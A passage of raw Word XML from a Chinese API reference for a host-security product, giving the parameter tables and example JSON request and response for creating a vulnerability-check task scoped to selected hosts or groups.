          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC0E753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0977360B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E9E1737" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE878C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocTaskCreateParams</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6E1766" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C848B3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23DE34D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测项列表，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31ED5D2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1088"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="17CBF17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A1BF955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E39335B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1373FF1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="640E6880" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44BD3E32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FAF21F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07272FDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0563BEED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EA03FD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="294E003D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B07D503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6683AD8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A5F5C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD2C14A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51897A1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306BDB29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C373CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493EA3B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="031B8351" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux的主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="221E9384" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1505"/>
        <w:gridCol w:w="2137"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="3373"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="49A6134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A0DE56E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52276275" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BF916DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DEF1FDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E5E7F91" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033DD11A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758B8B2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0566B75C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5094FA98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险检查项Id，见4.5.6接口，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="787F7377" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A50E287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0F0A77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481164A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4E2F75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测方式，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10A7FF05" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7DA5E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B514FC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map&lt;String, Object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496E511F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282AE536" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17EF115A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49795574"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fix</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>liangyong_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042016002534",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "params": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED01FFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216795AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5c417ad07d761b3224c4280a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2019-01-18 15:05:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronTaskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastExecuteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE62894"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="74E707E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1AF6C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E69B60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E391A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4356D2F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A5AC99E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E27AE31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33527654" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D9236E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D511335" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="167B5D38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F5ABDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CEDB41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
